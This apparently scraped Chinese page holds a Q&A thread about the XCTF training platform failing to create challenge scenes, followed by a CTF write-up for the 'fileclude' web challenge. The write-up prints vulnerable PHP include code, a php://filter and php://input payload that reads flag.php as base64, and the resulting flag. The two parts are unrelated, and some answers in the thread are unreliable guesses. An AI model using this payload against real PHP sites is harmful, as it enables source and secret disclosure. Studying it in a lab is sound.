为啥攻防世界无法获取场景?

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了为啥攻防世界无法获取场景?相关的知识,希望对你有一定的参考价值。

获取场景一直卡在那里

因为你的垃圾该清理了,垃圾太多容易导致卡顿,所以说无法获取场景。追问

我全新的电脑?

参考技术A 可能是因为你在攻击别人 参考技术B 你可以先到相关的游戏论坛或者贴吧里面咨询一下子,如果无法解决,我建议你可以咨询客服。追问

这个是它服务器的问题,感谢!

本回答被提问者采纳
参考技术C 你是说的XCTF吧...接口调用错误,可能是你之前的场景创建多次超时了 参考技术D 不知道什么原因,我这两天也遇到了,提示场景创建错误。换电脑也不行,换账号能创建场景了,但是pwn的题连接环境时连不上,socket报10061错误(远程主机拒绝,百度说是服务器忙)。可能是它服务器的问题吧。

攻防世界WEB练习-fileclude

目录

题目场景

分析代码

解决思路

​编辑

base64解码

找到flag


题目场景

分析代码

<?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET["file1"]) && isset($_GET["file2"]))

    $file1 = $_GET["file1"];
    $file2 = $_GET["file2"];
    if(!empty($file1) && !empty($file2))
    
        if(file_get_contents($file2) === "hello ctf") //要求返回值为hello ctf
        
            include($file1);
        
    
    else
        die("NONONO");
 

解决思路

文件包含漏洞位于file1与file2两个变量中。其中,file2被放入了file_get_contents函数中,并要求返回值为hello ctf,我们可以用php://input来绕过;而file1被放入include函数中,并且根据题目提示,我们应该获取当前目录下flag.php的文件内容。因此我们可以使用php://filter伪协议来读取源代码。最终可以得到flag.php经过Base64编码后的结果

?file1=php://filter/read=convert.base64-encode/resource=flag.php&file2=php://input

base64解码

找到flag

cyberpeace7eaf71673582b983c07fabf14e1852b0

以上是关于为啥攻防世界无法获取场景?的主要内容,如果未能解决你的问题,请参考以下文章

攻防世界-web:ics-05

攻防世界-web:ics-05

pwn攻防世界 pwn新手区wp

攻防世界WEB进阶之upload1

XCTF攻防世界web新手区2——robots

攻防世界-upload